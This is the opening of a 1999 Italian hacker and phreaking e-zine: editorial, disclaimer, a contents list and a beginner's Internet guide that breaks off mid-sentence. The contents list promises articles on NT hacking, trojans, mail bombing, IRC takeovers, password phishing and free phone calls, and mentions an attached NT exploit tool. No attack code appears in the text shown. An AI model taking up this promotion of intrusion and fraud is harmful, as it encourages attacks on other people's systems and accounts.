@-,',.,',.,',.,',.,',-@ | _ _ ____ _ | | | \ | | _____ _| __ )(_) ___ ___ | -+- | \| |/ _ \ \ /\ / / _ \| |/ _ Y __|-+- : | |\ | __/\ V V /| |_) | | __|__ \ : | |_| \_|\___| \_/\_/ |____/|_|\___|___/ | @-,',.,',.,',.,',.,',-@ NEW BIES (num 1) (data 31/01/99) [ powered By ZeroCool and N0bodY88 ] Editoriale: Allora questa rivista e' nuovissima e quindi commenti e opinioni sono ben accette , qui cercheremo di darvi notizie per quanto riguarda i retroscena della telefonia [ quindi le varie societa' che ci fanno pagare la merda di bolletta ] , green , phreacking in generale e hacking e poi quel cazzo che al momento di salta in testa ok detto questo iniziamo. ... tra poco esce il numero zero di NewBies , la nostra e-zine ... io da oggi penso sopratutto a approfondire le mie a volte limitate capacita' per servire questa e-zines. NEW BIES e' nato un mese fa' ... Da quel giorno e' nata una stretta collaborazione dei ' creatori ' di #hackernow, un idea nata dal nulla [ anche se voglio far notare che pochi si sono impegnanti per l' uscita del numero 0 ] e che oggi vede la sua realizzazione spettacolare voglio subito dire che non ci riteniamo bravissimi e quindi ogni critica e' positiva per la nostra e-zine. Spettacolo io sono convinto che nel scrivere questa rivista ho migliorato i concetti che gia' erano dentro di me e che sempre vi rimarrannano ... Spero che questa rivista approfondisca [ o lanci ] concetti che ci aiuteranno ad arrivare a risultati concreti sia per quanto riguarda l' hacking e per quanto riguarda il phreacking ... Non siamo certo a livelli di BFI ma ci proviamo comunque alla fine e' importante secondo me cercare di approfondire l' underground italiano [ se ovviamente questo esiste e ne ho forti dubbi ], bho comunque io sono convinto che sia eccezionale creare qualcosa dal nulla . ZeroCool DISCLAIMER LEGALE ------------------------------------------------------------------------------ IL NEWBIES STAFF NON SI ASSUME NESSUNA RESPONSABILITA' X L'UTILIZZO DELLE TECNICHE SOTTO RIPORTATE, LE QUALI SONO STATE DISTRIBUITE UNICAMENTE X CONDIVIDERE LE CONOSCENZE DA NOI "ACUISITE" (mitico edu...) E PER CERCARE QUALCUNO CON CUI CONFONTARE LE NS ESPERIENZE E LE CONOSCENZE X MIGLIORARE VICENDEVOLMENTE.....DIVERTENDOSI! N0bodY88 of NewBies Staff ------------------------------------------------------------------------------ PREMESSA Questa e-zine e' nata in una giornata qualsiasi di gennaio, mentre 2 newbies stavano parlando tra loro in IRC di non mi ricordo cosa. Da quel fatidico giorno la e-zine e' cresciuta, le persone che ho contattato x scrivere un articolo mi hanno dato la loro disponibilita' e entro alcuni giorni mi hanno fatto avere il loro operato. Alcune persone hanno fatto tardi x notti intere (fra cui il sottoscritto) ed hanno sacrificato il loro tempo x creare qualcosa che fosse nuovo, divertente, che ci facesse diventare + bravi, + amici, + uniti e forse...beh...forse anche + famosi...hihihi! Questo e' quello che abbiamo realizzato insieme, collaborando e scambiandoci opinioni. Se questa e-zine non vi piace, e' troppo semplice o e' stupida non scriveteci (oppure scriveteci x migliorare un art. della e-zine sfruttando le vostre conoscenze) ma se solo sara' piaciuta ad una persona, se solo un ragazzo dopo aver letto questa avra' deciso di passare a linux, di programmare in visual basic, di farsi una propria backdoor o di mettersi a studiare come si usa telnet (troppo poco attrezzato di voci nei menu x essere quello tanto decantato dovunque, ma anche troppo simpatico con il suo prompt a mo di Commodore 64) allora questa e-zine sara' servita a qualcosa. E ricordate...newbies si nasce, hacker si diventa. Buona lettura ^__^ N0bodY88 ͻ ARTICOLO ͹ AUTORE ͹ 2 PAROLE SUGLI ALLEGATI N0bodY88 GUIDA A INTERNET [ X VERI NEWBIES ] DarkSide LE NOVITA' PER QUANTO RIGUARDA MAMMA TELECOM E LE ALTRE ... ZeroCool TELEKOM E CENTRALINE [ Dr.Shade e Cyrus The Virus ] I.H.C. INTERESSANTI INFO SU TELEFONI E AFFINI NewBies Staff CABINE X NAVIGARE GRATIS KaOsS CELLULARI E SCHEDE TELEFONICHE {PrOzAcK} GREEN: MA QUANTI CAZZ CE NE SONO ZeroCool COMPUSERVE ZeroCool GUIDA ALL' HACKING DI WINDOWS NT Ax1s CHI HA PAURA DI NET-BUS E BACK ORIFICE? ZeroCool LINUX NewBies Staff LINUX [ UNA MIA DOMANDA ] ZeroCool LINUX [ NEWS ] ZeroCool IL KERNEL, QUESTO SCONOSCIUTO! ZeroCool LA POSTA ANONIMA RigoR MorteM SE IO SONO IO E TU 6 TU KI E' IL + SCEMO TRA NOI 2 Dante Alighieri COME SI DIVENTA HACKER IN POCHI SEMPLICI PASSI? N0bodY88 COME NASCONDERE L'IP IN ICQ (MA SOLO IN QUELLO) N0bodY88 BUGGATI CHE MI BUGGO ANCH'IO [ PHF] L0rD D3sTRuTi0N CHE BELLO EMAILIZZARCI INSIEME - MAIL BOMBING Vecna COME SI METTE UN BOT? Ja[3]Ck SEZIONE IRC NewBies Staff COME VELOCIZZARE IL TRASFERIMENTO DI FILE IN DCC SU mIRC {D4m4g3~M4N} COME FARE UN TAKE-OVER SE L'OP E' UN BENEMERITO IMBECILLE {D4m4g3~M4N} COME FARE AD AVERE LA PASS DI QUALCUNO CHIEDENDOGLIELA {D4m4g3~M4N} COME HACKKARE UN SITO PORNO _p0nic0_ RFC _p0nic0_ IP SPOOFING CON I WINGATE Zinco CLIENT MIRC Zinco CLIENT VIRC Zinco CURIOSITA' SU... NewBies Staff JOE ACCOUNT N0bodY88 PRIVACY SU NETSCAPE N0bodY88 QUANDO HACKERARE (O ALMENO TENTARE)? N0bodY88 COME CREARE UN COLLEGAMENTO INTERNET CON NOTEPAD N0bodY88 SPOOF Vulcan TROJAN Vulcan -=HACKER MANIFESTO=- BY MENTOR TRADOTTO DA x-h4ck3r x-h4ck3r CHE DIFFERENZA C'E' TRA TCP E UDP? N0bodY88 QUELLA GRAN TOPA DI E-ZINE CHE STA VENENDO FUORI N0bodY88 PING - PONG ZeroCool I SERVER DI NEWS E I PROXY ZeroCool LISTA MOLTO BREVE DI PROXY N0bodY88 METAFORA DEL COWBOY .... Dante Alighieri MANIPOLATI SI' MANIPOLATI NO?! SpIRIToZ UN PO' DI MAILING LIST ESSENZIALI X HACKERS E NEWBIES CrazyCrom FRONTPAGE SERVER EXTENSIONS Blum E-MAIL ASSOLUTAMENTE ANONIME Ax1s VISUAL BASIC TUTORIAL [ PRIMA PARTE ] Ron|n C TUTORIAL [ PRIMA PARTE ] CRUSAD3R GREEN UPDATE [ CHE SFIGA NE HANNO BECCATI ALTRI ] ZeroCool IL LOG DEL MESE ZeroCool COSA DI SOLITO CONTIENE IL FILE TEST-CGI.CGI ZeroCool GREEN UPDATE ZeroCool MA QUANTO E' BELLA LA VITA ZeroCool SALUTI Newbies Staff 2 PAROLE SUGLI ALLEGATI: - sechole2.zip = prog che viene utilizzato x fare cio' che spiega Ax1s - mcrack.htm = pagina che ^Aciburn ci ha consigliato di inserire e che noi abbiamo "addato" con molto piacere e....ironia....hihihi N0bodY88 ͻ Ŀ GUIDA A INTERNET [ per veri newbies ] ٺ ͼ Ok ragazzi ci siamo, siamo al primo numero di questa e-zine dedicata ai Newbie ed per questo che ho pensato di realizzare una mini guida ad Internet per tutti quelli che approdano alla Rete per la prima volta, che kazzo mi passato per il cervello, ce ne sono a miliardi, bhe una pi una meno.... durante la lettura potreste avere l'impressione di averlo gi letto da qualche parte sappiate che probabilmente cos infatti, questa guida non altro che l sunto di molte, molte letture rielaborate in base alla mia piccola esperienza personale (sono un Newbie pure io che credete :) ). BASTA HAI ROTTO!!! Ok, ok procediamo, mha da dove comincio, il primo DIO..., no non cos dal principio dunque vediamo ah gi ecco... Cos' Internet ? Internet in primo luogo un grande insieme di computer collegati tra loro, su cui vigono determinate convenzioni che permettono la trasmissione dei dati fra i vari PC, la Rete per non fatta solo di cavi, chip e programmi. Internet fatta da milioni di persone che si scambiano messaggi, ricercano informazioni, discutono ecc... in poche parole Internet una societ virtuale, senza confini e come tale ha delle regole che devono essere rispettate o almeno dovrebbero :). Come nasce Internet ? Internet nasce da un progetto del dipartimento della difesa degli USA negli anni '60 in quanto in durante la guerra fredda gli Stati Uniti volevano avere un sistema di comunicazione per mandare gli ordini e tenere i contatti con le proprie forze armate, che non fosse vulnerabile come le centraline telefoniche, principale obiettivo degli attacchi. Nel 1964 un ricercatore della Rand Corp., di nome Paul Baran, propose una soluzione. Egli progett una rete di comunicazione tra computer che non aveva alcun nodo centrale e nessuna autorit governante. La rete di Baran divenne la base tecnologica di Internet. Le universit diedero un grande impulso alla crescita e diffusione di Internet. Dall'universit la Rete si espanse alle aziende e alle famiglie. Oggigiorno chi si connette ad Internet diventa un cittadino del Villaggio Globale. Struttura Client - Server I dialoghi tra computer su Internet si basano sul modello "client-server", in poche parole, una configurazione di Rete che funziona secondo i principi di distribuzione dell'informazione e di condivisione di essa da parte di pi utenti. In pratica questo modello prevede che ciascun utente possa mettere a disposizione di altri utenti le informazioni di cui in possesso, (facendo cos da server), e quindi possa a sua volta riceverne da altri (mettendosi nella condizione di client). molto importante sottolineare che i ruoli di server e client non sono predefiniti come molti credono ma, al contrario sono intercambiabili, esistono comunque anche modelli centralizzati che non permettono questo scambio di ruoli. Cosa devo sapere e di cosa ho bisognio per collegarmi ad Internet? Innanzitutto quello di cui avete bisogno per collegarvi ad Internet un PC dotato di modem, tengo a precisare che non esiste un computer studiato appositamente per Internet, in pratica la connessione pu essere effettuata anche con un computer di vecchia generazione ma, lo svantaggio pi evidente sta nel dover subire estenuanti tempi di attesa per la visualizzazione di qualsiasi pagina. di semplice intuizione quindi che, quanto maggiori sono le prestazioni del vostro PC, tanto pi veloce sar la trasmissione dei dati; sottolineo per che le buone prestazioni del computer non implicano una costante fluidit della navigazione in quanto questa determinata anche da altri fattori come per esempio il traffico telefonico (ammesso che non si disponga di una linea dedicata). In secondo luogo, chi vi fornisce l'accesso (provider) deve darvi alcune informazioni necessarie per la configurazione della procedura di connessione: 1. Gateway secondo le direttive del pop di appartenenza 2. DNS primario ed eventuali altri DNS 3. Dominio 4. N di telefono da chiamare per la connessione 5. SMTP, POP3 e NNTP se disponibile 6. Proxy server se disponibile Ovviamente dovrete comunicare al vostro provider anche la vostra login e password che dovrete fare in modo di non dimenticare!! probabile che vi venga fornito anche un programma (comunemente incluso nel browser ma, non sempre), che vi seguir passo per passo nella configurazione della connessione, nella migliore delle ipotesi potete sperare in una procedura automatica di connessione grazie alla quale non dovrete fare altro che un semplice click per ritrovarvi poco dopo a navigare nell'immenso "mare" di Internet. Cosa faccio con Internet? Mi sembra giusto prima di concludere questa introduzione, spendere due parole sulle potenzialit di Internet. La prima risorsa a cui un utente approda quando in rete il WWW, ma esistono anche molti altri servizi di grande utilit quali ad esempio: FTP I newsgroup Le mailing list Archie Gopher IRC Telnet ecc... A questo punto siete pronti per addentrarvi nel mondo stando comodamente seduti davanti al vostro PC ma, sicuramente non avete idea di come muovervi, sono cos tante le curiosit e i dubbi che Internet in grado di procurare che si rischia spesso di non concludere niente, per questo, da qui in poi cercher di rispondere ai dubbi pi comuni che sorgono appena ci si trova connessi nella stessa sequenza in cui io li ho incontrati e superati. Cos' il WWW? World Wide Web (ragnatela mondiale) il nome (abbreviato in WWW) con il quale si identifica comunemente l'insieme di ipertesti collegati tra loro che attualmente costituiscono l'aspetto pi userfriendly di Internet per chi non sapesse cos' un ipertesto niente paura il concetto di estrema facilit essi sono semplicemente oggetti informatici, di qualsiasi tipo, che hanno la caratteristica di contenere al proprio interno oltre a informazioni anche link (collegamenti) ad altri ipertesti. Pensando agli infiniti link che si possono creare si ha l'immediata percezione del vantaggio che gli ipertesti comportano. Come costituito un indirizzo Internet? Esaminiamo per prima cosa gli indirizzi superficialmente, in modo da riuscire, in seguito, a comprendere concetti pi complessi, un indirizzo Internet si suddivide in 4 parti principali: 1. Protocollo 2. Indirizzo dell'Host 3. Directory (se non specificata il documento si trova in c:\) 4. Nome pagina Il protocollo pi usato in Internet Http che significa Hyper Text Transfer Protocol. Indica che state cercando un documento di testo piuttosto che un file o altro ancora. Vi sono diversi tipi di protocolli ma per ora basti sapere che i 2 pi usati sono il succitato Http e l'Ftp ovvero File Transfer Protocol che serve per scaricare i file dalla Rete al vostro Pc (Download) e viceversa (Upload). L'indirizzo dell'Host, se questa messa a disposizione per il Web, generalmente preceduto dalla sigla www. mentre se usata per scaricare file il suo prefisso e' ftp. La directory specifica fiscamente la posizione del file all'interno dell'Host. Inutile dire che il nome del documento serve per pescare proprio quello che ci interessa tra i tanti disponibili. Grazie a quanto sopra detto ora risulter facile creare gli indirizzi che pi ci interessano come ad esempio: http://www.univr.it/software.htm una volta digitato questo indirizzo possiamo ottenere tutto il software che l'universit di Verona mette a disposizione dei vari utenti (http:// pu essere omesso). Esaminiamo ora sotto un aspetto pi particolareggiato gli indirizzi Internet. Quello che sopra ho sommariamente definito come indirizzo dell' Host scomponibile in sottoparti le quali, hanno tutte un loro nome tecnico che utile conoscere per evitare di trovarsi in difficolt. La via per imparare lunga se si va per regole, breve ed efficace se si procede per esempi, quindi prendiamo in considerazione il seguente indirizzo: http://Members.tripod.com/Pub/~Newbie/Homepage.htm per prima cosa scomponiamolo nelle 4 macro parti principali: 1. Http:// (Protocollo) 2. Members.tripod.com (nome Host) 3. /Pub/~Newbie/ (directory, ~Newbie inventata per questo esempio) 4. Homepage.htm (nome pagina, inventato per questo esempio) Il punto numero 2 si pu suddividere ulteriormente nelle seguenti sotto parti a partire da sinistra: 1. Members "nome proprio" (hostname) del computer 2. Tripod dominio di secondo livello o sottodominio (subdomains), a volte ve ne pi di uno e in quel caso sono sempre pi grandi a partire da sinistra verso destra. 3. Com dominio di primo livello o semplicemente dominio Mi sento in dovere di dire che quanto sopra esposto dovrebbe essere la norma ma spesso le convenzioni sono diverse. Esistono circa 258 domini diversi, alcuni domini nazionali sono ad esempio: .it per Italia .us per United States .fr per Francia ecc.. esistono poi altri domini che identificano le organizzazioni ad essi appartenenti come ad esempio: .edu Universit .com Societ commerciali .org Organizzazioni senza scopo di lucro .gov Istituzioni governative .mil Esercito .net Organizzazioni di gestione della rete Questo tipo di domini si trovavano in passato solamente all'interno degli USA ma oggi questa distinizione scomparsa. Importante precisare che non vi alcun vero e proprio vincolo geografico che individui i vari domini e che le informazioni cercate risiedono sull'Hostname, i subdomains servono a specificare un insieme al quale appartiene l'Host che contiene il documento cercato. Tecnicamente l'indirizzo internet si schematizza cos: metodo://nomemacchina:porta/nomeoggetto dove il metodo pu essere Http, Ftp ecc... , il nomemacchina il nome del computer su cui si trova l'oggetto cercato, la porta (solitamente sottintesa) il numero della porta con cui si intende comunicare con l'altra macchina, esso varia a seconda del metodo scelto. Il nomeoggetto il percorso pi il nome del file cercato. Lo schema di cui sopra detto URL (Uniform Resource Locator, ovvero Localizzatore Uniforme di Risorse) che si rivela essere nient'altro che il comune indirizzo Internet ormai a tutti noto quindi se doveste imbattervi nel famoso Error 404 URL Not found i casi sono 3: 1. Avete sbagliato a digitare l'indirizzo, o comunque se avete selezionato un link l'autore della precedente pagina ha sbagliato a digitarlo 2. Avete digitato correttamente l'indirizzo, ma la fonte da cui lo avete ricavato vi ha fornito un'informazione errata 3. Avete digitato correttamente l'indirizzo ma, il file corrispondente stato spostato, cancellato o rinominato In realt la gestione degli indirizzi Internet molto pi complessa di quanto possa apparire infatti come noto i computer non sanno gestire informazioni diverse da numeri binari questo comporta ovviamente una serie di problemi legati alla gestione della Rete in particolare lecito chiedersi: << Come fa la Rete a sapere dove si trova il computer Prefisso.Hostname .Dominio ? >>. Per arrivare alla soluzione di questo problema necessario introdurre le nozioni di: 1. Ip address, ovvero combinazione di 32 bit che identifica univocamente un qualsiasi computer connesso ad Internet. 2. DNS (Domain Name System) il sistema utilizzato dai computer che gestiscono Internet per tradurre gli indirizzi letterali nel corrispondente Ip address e viceversa. Come si pu facilmente intuire, non possibile che in un solo computer siano memorizzati tutti gli indirizzi letterali con relativo Ip infatti, la traduzione avviene in diverse fasi grazie all'aiuto di altri elaboratori. Htm o Html? A seconda del sistema operativo che si usa le estensioni dei file Web possono essere .HTM o .HTML. Inizialmente il Web stato sviluppato su computer UNIX e i file avevano estensione .HTML. In seguito con la diffusione di Windows 3.1 entr in uso l'estensione .Htm per via della limitazione a soli 3 caratteri nell'estensione dei file gestiti dal DOS-Windows 3.1. Oggi si incontrano comunemente sia file .HTM che .HTML e anche se Windows 95/98 in grado di gestire file con estensioni maggiori, non tutti i programmi Windows per l'editing dei file .HTML possono. Inoltre vi sono ancora computer basati DOS-Windows 3.1 utilizzati per creare pagine Web. Come costituito un indirizzo e-mail? Leggermente diverso da un indirizzo internet un indirizzo e-mail si compone di 3 parti principali: 1. Il nome dell'account (un identificativo personale) 2. Il simbolo @ (si pronuncia "et" in inglese) 3. Il nome del dominio L'account in genere il nome che ciascuno utilizza per connettersi al proprio Provider. Dopo l'account c' il simbolo @ che serve a separare l'account dal nome del dominio. Il nome del dominio generalmente l'indirizzo della ditta che fornisce l'accesso ad Internet. Quello che ho chiamato account pu essere chiamato in modi molto diversi fra i quali i pi comuni sono: User ID User Name Logon ID Se non si possiede un indirizzo di posta personale e possibile crearsene uno Online ad esempio io ho 2 indirizzi: 1. xxxxx@xxxxxxxxxxx.it (e-mail personale fornita con il contratto di abbonamento, censurata per motivi di privacy) 2. dark_s@freemail.it (e-mail online gratuita fornita da Freemail) Ed in genere agli amici fidati comunico il primo indirizzo mentre ai semplici conoscenti il secondo, per ovvi motivi di sicurezza personale. Come faccio a reperire le informazioni che mi interessano? Purtroppo, al giorno d'oggi, non esiste ancora un elenco di Rete completo da consultare per trovare tutte le informazioni relative ad un argomento che ci interessa in particolare perch, sarebbe troppo grande per poter essere gestito. Esistono per siti che danno la possibilit di effettuare ricerche, che permettono di trovare pagine che riguardano l'argomento che ci interessa. Essenzialmente, gli strumenti che un utente medio utilizza pi di frequente sono: 1. Indici di rete 2. Motori di ricerca Negli indici di rete sono memorizzati gli indirizzi divisi per categoria, ed quindi necessario scegliere la categoria a cui si interessati per ricevere un elenco di siti con i relativi rimandi Si tratta di programmi che accettano in input una o pi parole chiave e forniscono in output i documenti che le contengono, ordinati in funzione della probabilit che riguardino pi o meno strettamente l'argomento al quale siamo interessati, tuttavia, le pagine non sono divise in categorie Se pur concettualmente diversi questi due strumenti tendono ad un processo di unificazione per cui oggi non pi possibile una netta distinzione. Vi sono poi altri strumenti con i quali possibile effettuare ricerche ma noi ci limiteremo ad analizzare i 2 che vanno per la maggiore. Gli indici di Rete, sono consigliati quando non si vuole ricercare un sito specifico ma, semplicemente navigare il Web, selezionate l'argomento e buon viaggio. I motori di ricerca meritano invece maggiore attenzione, in quanto, per trovare un argomento in particolare, potrebbe essere necessario formulare quesiti per mezzo di una sintassi logica ed quindi necessario saper utilizzare in maniera corretta operatori logici quali ad esempio AND, OR, NOT e altri. Innanzitutto da dire che generalmente i motori di ricerca permettono due tipi di ricerca quella semplice e quella complessa e o avanzata. Uno dei pi considerevoli vantaggi della ricerca semplice che questa gradua i risultati automaticamente in modo che i documenti di maggior rilievo, quelli pi probabilmente abinabili alla/e parola/e chiave, vengono ad essere posizionati in cima alla lista dei risultati. In pi la Ricerca Semplice consente di ricercare parole e frasi in modo naturale quindi non si deve necessariamente apprendere una sintassi complicata o delle formulazioni complesse. La Ricerca Avanzata si usa se: 1. Si in grado di comporre quesiti usando la sintassi logica 2. Si interessati a documenti modificati per l'ultima volta in uno specifico periodo di tempo 3. Si vuole avere una graduazione personalizzata dei risultati 4. Si vogliono cercare parole vicine l'una all'altra, in una distanza massima di 10 parole Trattiamo ora dal punto di vista operativo i due tipi di ricerca premettendo che non tutte le funzioni di seguito esaminate sono standard. Ricerca semplice Regole: Se nella finestra di dialogo di un motore di ricerca si scrive sport calcio si avranno in output tutti i documenti che contengono sia la parola sport sia la parola calcio, ovviamente i documenti associati a queste due parole sono milioni ma si tenga comunque presente che i risultati sono graduati. Per avere risultati pi adeguati bisogna prima di tutto imparare ad usare il pi (+), il meno (-), le virgolette ("), il carattere jolly (*) e l'uso delle maiuscole. Pi Quando posto davanti a una parola si richiede che questa appaia nei risultati. Meno Quando posto davanti a una parola la esclude dai risultati. Virgolette Si usano per cercare una frase. Asterisco Trova tutte le parole che iniziano in un determinato modo. Maiuscole Si usano se non si vuole che la ricerca sia sensibile alla lettera. Esempi: datteri mandorle torta ricetta Ricerca una ricetta di torta che possibilmente contenga datteri e mandorle, se il documento contiene tutte e 4 le parole, sar posizionato in cima alla lista dei risultati, i documenti che ne contengono solo alcune di seguito e quelli che ne contengono una alla fine. auto "vendita auto" Cerca tutti i documenti che contengono la frase vendita auto o la parola auto, le virgolette che racchiudono vendita auto indicano che le parole dovranno apparire insieme nell'ordine in cui si trovano. digitaliz* Il carattere jolly indica che l'utente interessato a documenti che contengono le parole digitalizzazione, digitalizzare, digitalizzato ecc.. +vietnam+film-"good morning vietnam" Indica che i documenti devono contenere entrambe le parole (vietnam e film), ma non possono contenere la frase good morning vietnam. Ricerca complessa Regole: Come gi detto sopra per utilizzare la ricerca complessa necessario conoscere gli operatori logici che sono: AND Ricerca i documenti contenenti tutte le parole o frasi specificate. OR Individua documenti contenenti almeno una delle parole specificate ma non esclude che tali testi contengano tutte le parole. NOT Esclude i documenti contenenti la parola o la frase specificata. Questo operatore non pu mai essere usato da solo. NEAR Trova documenti contenenti le parole o frasi specificate entro 10 parole di distanza l'una dall'altra. (Le frasi si compongono allo stesso modo visto per la ricerca semplice). consigliato inoltre il costante utilizzo delle maiuscole per distinguere le parole chiave dalle parole cercate. Inoltre tenete presente che se si deve usare un operatore come parola da ricercare, bisogna inserire la parola tra virgolette per distinguerla dalla parola chiave operatore con lo stesso nome. Nel caso in cui in un quesito vi siano pi operatori buona abitudine usare le parentesi () per riunirli con le parole da cercare. Per circoscrivere una ricerca nel tempo necessario specificare la data nel formato gg/mm/aa dove mm espresso con le prime tre lettere inglesi del nome del mese, inoltre se il mese o l'anno vengono omessi si presume siano quelli correnti. Per graduare i risultati si devono inserire le parole nel campo graduazione altrimenti essi appaiono in ordine casuale anche possibile selezionare un determinato campo di ricerca. Esempi: (paperino OR paperinik) AND (paperone OR archimede) Questo quesito specifica che paperino o paperinik devono comparire nello stesso documento insieme a paperone o archimede. Zio NEAR Paperone Questo quesito specifica che entrambe le parole Zio e Paperone devono essere presenti al massimo con 10 parole di distanza tra loro, NEAR un operatore molto utile nella ricerca dei nomi. disney AND (paperino NEAR archimede) AND (NOT paperinik) Questo quesito specifica che i documenti devono contenere disney e paperino entro 10 parole da archimede ma non la parola paperinik. disney AND (NOT(Qui OR Quo OR paper*)) AND Minni Questo quesito specifica che i documenti trovati devono contenere i termini disney e Minni ma non possono contenere Qui o Quo o qualsiasi parole che inizia per paper. Un particolare ringraziamento alla Disney, prego tutti i lettori di scusarmi non mi veniva in mente altro :) Piet ..... Per concludere, rimane da dire che i motori di ricerca funzionano in gran parte grazie alla buona volont degli utenti infatti, chiunque pu inserire un nuovo URL in un Net Motor. Inoltre esistono 2 tipi di Net Motor: 1. Motori Nazionali 2. Motori Internazionali in genere questi ultimi permettono anche di selezionare una lingua in particolare con un semplice click del mouse. Questa era la panoramica pi ampia che si potesse dare sui Net Motor, ora manca solo la pratica, ecco di seguito un elenco dei motori pi conosciuti: www.yahoo.com www.lycos.com www.infoseek.com www.hotbot.com www.altavista.digital.com Con la pratica si vedr che molte altre sono le possibilit che offre il mondo del WWW ma, quanto gi detto basta per sapersi orientare. Cos' l'FTP? Come gi precedentemente accennato l'ftp un protocollo che serve per scaricare i file dalla rete al vostro PC e viceversa, sebbene questo tipo di operazione sia possibile anche attraverso WWW, con il protocollo http, usare ftp comunque la scelta migliore. Diversi sono i motivi che giustificano l'affermazione precedente, ad esempio, mentre l'http permette il trasferimento di un file, solo se questo compare come rimando selezionabile, l'ftp permette di leggere le directory e il loro contenuto, proprio come se ci si trovasse davanti al computer nel quale sono contenuti i file che si vogliono copiare, (computer remoto). Inoltre, possiamo muoverci all'interno di queste directory e, grazie ai programmi ftp a interfaccia grafica, non dobbiamo nemmeno preoccuparci di conoscere i comandi del sistema operativo installato nel computer remoto infatti, comandi come dir o ls (in Unix l'equivalente del comando dir), vengono impartiti con il mouse, (si noti che, questi programmi sono piuttosto recenti infatti, prima bisognava arrangiarsi con l'interfaccia a riga di comando). Il vantaggio principale che l'utilizzo di questo protocollo comporta , a mio avviso, la possibilit di riesumare i download interrotti infatti, oggi la maggior parte dei server ftp fornisce questa possibilit, molto utile, in quanto evita inutili perdite di tempo che potrebbero costare molto care in termini di bolletta telefonica. In effetti, potrebbe non essere chiaro il significato del termine download, in parole semplici, questo termine viene utilizzato per indicare il trasferimento di uno o pi file dal computer remoto al proprio PC, l'operazione contraria viene denominata upload. I collegamenti a un sito ftp, possono essere realizzati in diversi modi infatti, oltre ai gi citati programmi a interfaccia grafica, oggi una sessione ftp pu essere eseguita con un qualsiasi browser, l'interfaccia quella tipica in altre parole, i file del sito ftp appaiono come collegamenti ipertestuali, fate click sul collegamento al file che vi interessa per eseguirne il download, esistono poi altre possibilit per utilizzare ftp che, essendo pi complicate sono oggi in disuso. Personalmente, preferisco utilizzare un vero e proprio client ftp perch, a volte, i collegamenti ftp stabiliti con un browser Web creano qualche problema, inoltre, generalmente, i browser non permettono di compiere tutte le operazioni che svolge un programma ftp come ad esempio l'operazione di upload. La comprensione del funzionamento dei programmi ftp ad interfaccia grafica, non crea nessuna difficolt infatti, essi hanno il pregio di essere molto intuitivi, sufficiente uno sguardo per capire come si usano, ed proprio per questo motivo che ne consiglio l'utilizzo. Ecco i nomi dei client ftp pi diffusi: CuteFTP WS_FTP Per quanto riguarda i siti ftp, bisogna sapere che ne esistono di due tipi: 1. Siti ftp privati 2. Siti ftp pubblici Per poter accedere ai siti ftp privati, necessario possedere una login e una password che sono assegnate dal gestore del sito, mentre quando si accede ad un sito ftp pubblico in genere, si fornisce come login la parola anonymous, (in questo caso si parla di ftp anonimo), e come password il proprio indirizzo e-mail generalmente il tutto fornito in maniera automatica dal proprio client. Una volta aperta la sessione il sito ftp si presenta come un albero di directory, generalmente nella directory principale si trova un file di testo con la descrizione del contenuto delle altre inoltre, gli stessi nomi delle directory (ormai una convenzione), ne suggeriscono il contenuto. Ogni volta che si esegue un download, opportuno fare una scansione del file per verificare che non sia infetto da qualche virus, a questo scopo consigliato un antivirus che esegue la scansione automatica del file al termine di ogni download, questo vi evita di doverla avviare manualmente e soprattutto di doverlo ricordare ogni volta. Se l'antivirus vi dovesse segnalare che il file scaricato infetto NON FATEVI PRENDERE DAL PANICO, le leggende sui virus sono molte ma, in realt, esiste solo un modo con cui un virus proveniente dalla Rete pu entrare nel vostro computer e cio, siete voi che dovete mandare in esecuzione in modo diretto (.COM, .EXE) o in modo indiretto (Macro di word o file batch), un file infetto. Archie e Gopher Prima di iniziare a descrivere il funzionamento di queste due risorse Internet, vorrei precisare che personalmente non le ho mai utilizzate perch, a mio avviso, sono obsolete in confronto ad altre, per quello che mi riguarda, non mi mai capitato di non riuscire a soddisfare le mie esigenze attraverso gli altri strumenti disponibili, quindi pur conoscendo il funzionamento di tali risorse non ho mai avuto la necessit di usarle. Archie ovvero Archive Archie un sistema di database che contatta periodicamente i server FTP sparsi per il mondo e ne cataloga il contenuto, in genere questo database viene interrogato dagli utenti che cercano un determinato file, ma non sanno in quale sito FTP si trovi. Anche Archie come ftp permette di effettuare i collegamenti in diversi modi i pi comuni sono: via Web o tramite client Archie, esistono poi altre tre possibilit, ma sono quanto meno scomode e, per questo, mi limiter a parlare di quelle appena citate. Con il proprio browser possibile usare un server Archie via Web, (se non sapete dove trovarlo fate una ricerca con un qualsiasi Net Motor), una volta contattato tale server riempite opportunamente l'apposita casella e avviate la ricerca. Nella pagina Web visualizzata, probabilmente troverete alcune funzioni supplementari che per la maggior parte sono intuitive ma, utile commentare brevemente i tipi di ricerca che sono disponibili. Una ricerca si pu effettuare in modi diversi a seconda dell'opzione selezionata, generalmente passibile basare la ricerca: 1.esattamente sul testo digitato 2.su una espressione Unix 3.sulla base del testo digitato, con possibilit di trovare file che semplicemente lo contengono e, non consentendo la sensibilit alle maiuscole (Default) 4.sulla base del testo digitato, con possibilit di trovare file che semplicemente lo contengono ma, consentendo la sensibilit alle maiuscole, scegliete quella che pi si adatta e buona fortuna. Per quanto riguarda i client Archie, non resta che recuperarne uno e provare, tutta la teoria necessaria stata sopra esposta il resto solo pratica. A mio avviso, Archie stato ampiamente rimpiazzato da siti quali ad esempio: www.download.com e tanti altri. Gopher Gopher l'immediato predecessore del WWW e rappresentava una grande risorsa prima della fine del 1994 periodo in cui la comparsa del primo Browser favorisce lo sviluppo del WWW che segner in seguito il declino di Gopher. Gopher presenta una serie di men testuali che una volta selezionati possono portare ad altri men, alla copia di un file o altro ed l'evoluzione della precedente interfaccia a riga di comando. Oggi si usa tramite Web, ed esistono programmi per effettuare le ricerche su server Gopher, ma ormai questo sistema dimenticato da tutti e del resto pi che comprensibile. Cos' Telnet? Telnet un programma che consente al nostro PC di diventare un terminale di un elaboratore remoto, tutto ci che noi faremo una volta aperta la sessione Telnet, sar elaborato dal computer remoto e non dal nostro PC e, proprio per questo motivo, sono previsti diversi livelli di utenza ognuno dei quali consente o meno l'accesso a determinati file. Per accedere a Telnet usate Telnet.exe di Windows 95, se non siete abilitati per una sessione telnet dal vostro provider, cercate un sistema in cui l'accesso sia consentito a tutti, (usate i Net Motor), se dopo la connessione il testo non viene visualizzato in modo chiaro, cambiate l'emulazione del terminale, in genere VT-100 (Default) funziona correttamente. La comunicazione in Internet, analisi delle varie possibilit. Internet, mette a disposizione dell'utente molte possibilit per conversare in rete, e di questo tutti abbiamo sentito parlare ma, oltre agli esami di laurea in diretta, quali sono le reali possibilit? Innanzitutto per meglio comprendere l'argomento si rende necessaria una prima macro distinzione tra 